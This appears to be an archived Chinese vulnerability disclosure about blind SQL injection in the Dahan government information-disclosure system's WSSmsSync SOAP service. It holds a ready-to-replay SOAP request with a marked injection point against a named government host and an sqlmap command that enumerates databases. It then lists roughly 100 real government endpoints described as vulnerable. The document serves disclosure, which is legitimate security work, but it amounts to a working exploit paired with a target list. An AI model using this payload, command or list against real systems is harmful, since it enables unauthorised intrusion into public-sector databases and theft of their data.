VULHUB ™

### 简要描述： 大汉政府信息公开多处SQL注入(附100个案例) ### 详细说明： 同样webservice漏洞，漏洞存在于 /xxgk/services/WSSmsSync?wsdl WSSmsSync服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在，如 isBase64 wsSyncGetInfos wsSyncGetInfos setStrAppId setBase64 上述方法的多个参数均存在漏洞，这里随便选取一个方法（wsSyncGetInfos）进行测试 用WSockExpert v0.7抓包，并保存为wooyun.txt ``` POST /xxgk/services/WSSmsSync?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yj.gov.cn Connection: Close User-Agent: google robots <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms"> <soapenv:Header/> <soapenv:Body> <rec:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <strLoginId xsi:type="xsd:string">1*</strLoginId> <strPwd xsi:type="xsd:string">1</strPwd> <beginTime xsi:type="xsd:string">1</beginTime> <endTime...

### 简要描述： 大汉政府信息公开多处SQL注入(附100个案例) ### 详细说明： 同样webservice漏洞，漏洞存在于 /xxgk/services/WSSmsSync?wsdl WSSmsSync服务的多个方法，多个参数存在严重漏洞，且该漏洞普遍存在，如 isBase64 wsSyncGetInfos wsSyncGetInfos setStrAppId setBase64 上述方法的多个参数均存在漏洞，这里随便选取一个方法（wsSyncGetInfos）进行测试 用WSockExpert v0.7抓包，并保存为wooyun.txt ``` POST /xxgk/services/WSSmsSync?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yj.gov.cn Connection: Close User-Agent: google robots <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms"> <soapenv:Header/> <soapenv:Body> <rec:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <strLoginId xsi:type="xsd:string">1*</strLoginId> <strPwd xsi:type="xsd:string">1</strPwd> <beginTime xsi:type="xsd:string">1</beginTime> <endTime xsi:type="xsd:string">?</endTime> <maxId xsi:type="xsd:string">1</maxId> </rec:wsSyncGetInfos> </soapenv:Body> </soapenv:Envelope> ``` 案例一： xxgk.lyg.gov.cn [<img src="https://images.seebug.org/upload/201503/2921593442a45d515384f1914b7608027ce73fb1.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2921593442a45d515384f1914b7608027ce73fb1.jpg) 案例二： www.hzgjj.gov.cn [<img src="https://images.seebug.org/upload/201503/29215959b97983c3f79ca73a12611fb0b656bdbb.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/29215959b97983c3f79ca73a12611fb0b656bdbb.jpg) 案例三： xxgk.czzl.gov.cn [<img src="https://images.seebug.org/upload/201503/29220021418946c5ef60b0a6aa04c914bd603171.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/29220021418946c5ef60b0a6aa04c914bd603171.jpg) 案例四： xxgk.wencheng.gov.cn [<img src="https://images.seebug.org/upload/201503/29220145abb17fe7d33f395100d93bab9a8261d4.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/29220145abb17fe7d33f395100d93bab9a8261d4.jpg) 案例五： xxgk.yj.gov.cn [<img src="https://images.seebug.org/upload/201503/2922004944aef1cffc883a22bf8150e48110aa9d.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2922004944aef1cffc883a22bf8150e48110aa9d.jpg) ### 漏洞证明： 数据测试，该漏洞为盲注，非常慢 sqlmap.py -r wooyun.txt --current-db --dbs [<img src="https://images.seebug.org/upload/201503/29220306fb8b550eb864ca2ffd03ab3b4abb2357.jpg" alt="data1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/29220306fb8b550eb864ca2ffd03ab3b4abb2357.jpg) [<img src="https://images.seebug.org/upload/201503/292203221c3a32771c11c89f3c70ac475795dc7f.jpg" alt="data2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/292203221c3a32771c11c89f3c70ac475795dc7f.jpg) 由于该漏洞普遍存在，为证明漏洞的危害，同样列举100个案例： http://xxgk.zjds.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.taixing.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.jining.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.xxgk.lg.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.jinhua.gov.cn/xxgk/services/WSSmsSync?wsdl http://gongkai.sd-n-tax.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.wenzhou.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.jsgs.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.nbjiangbei.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.sdxm.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.changde.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.gygov.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.longwan.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.cqyc.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.gaomi.gov.cn:82/xxgk/services/WSSmsSync?wsdl http://www.huzhou.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.zaozhuang.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.lucheng.gov.cn/xxgk/services/WSSmsSync?wsdl http://zfxxgk.weihai.gov.cn/xxgk/services/WSSmsSync?wsdl http://218.94.123.47/xxgk/services/WSSmsSync?wsdl http://xxgk.yiyuan.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.zhucheng.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.nanxun.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.xiaogan.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.zibo.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.lyg.gov.cn/xxgk/services/WSSmsSync?wsdl http://211.138.126.163/xxgk/services/WSSmsSync?wsdl http://xxgk.wencheng.gov.cn/xxgk/services/WSSmsSync?wsdl http://zfxxgk.liaocheng.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.jsforestry.gov.cn/xxgk/services/WSSmsSync?wsdl http://60.190.68.201:7001/xxgk/services/WSSmsSync?wsdl http://xxgk.shizhong.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.gzlps.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.jingning.gov.cn/xxgk/services/WSSmsSync?wsdl http://blxxgk.bl.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.qingzhou.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.panxian.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.dongtai.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.shanghe.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.cncn.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.gzwd.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.hzgjj.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.siyang.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.zjwy.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.tianqiao.gov.cn/xxgk/services/WSSmsSync?wsdl http://218.2.208.145/xxgk/services/WSSmsSync?wsdl http://xxgk.jc.gansu.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.wzrc.net/xxgk/services/WSSmsSync?wsdl http://xxgk.hbjs.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.jiangyan.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.jingjiang.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.changle.gov.cn:82/xxgk/services/WSSmsSync?wsdl http://xxgk.szzj.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.stats-sd.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.hg.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.zjdlr.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.yj.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.yqjq.gov.cn/xxgk/services/WSSmsSync?wsdl http://zfxxgk.heze.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk3.nantong.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.jsgl.cn/xxgk/services/WSSmsSync?wsdl http://www.zjch.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.yidu.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.jsmuseum.com/xxgk/services/WSSmsSync?wsdl http://www.77778.com/xxgk/services/WSSmsSync?wsdl http://xxgk.pingyin.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.jshb.net/xxgk/services/WSSmsSync?wsdl http://zfxxgk.seac.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.tx.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.dejiang.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.yq.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.ec.js.edu.cn/xxgk/services/WSSmsSync?wsdl http://www.njzj.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.zjpy.gov.cn/xxgk/services/WSSmsSync?wsdl http://www.gaoqing.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.czzl.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.liuzhi.gov.cn/xxgk/services/WSSmsSync?wsdl http://xxgk.sx.gov.cn/xxgk_public/services/WSSmsSync?wsdl http://xxgk.10.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.ycxl.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.changyang.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.haiyan.gov.cn/gov/services/WSSmsSync?wsdl http://open.jiashan.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.yichang.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.dyq.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.xingshan.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.kuiwen.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.hbwf.gov.cn/gov/services/WSSmsSync?wsdl http://www.wuxing.gov.cn/gov/services/WSSmsSync?wsdl http://61.159.149.203:9080/gov/services/WSSmsSync?wsdl http://xxgk.dianjun.gov.cn/gov/services/WSSmsSync?wsdl http://211.138.126.163:7003/gov/services/WSSmsSync?wsdl http://xxgk.zrt.gov.cn/gov/services/WSSmsSync?wsdl http://220.191.221.136/gov/services/WSSmsSync?wsdl http://119.191.58.141/gov/services/WSSmsSync?wsdl http://zfxxgk.dongying.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.hbdy.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.yuanan.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.lijin.gov.cn/gov/services/WSSmsSync?wsdl http://xxgk.sdfda.gov.cn/gov/services/WSSmsSync?wsdl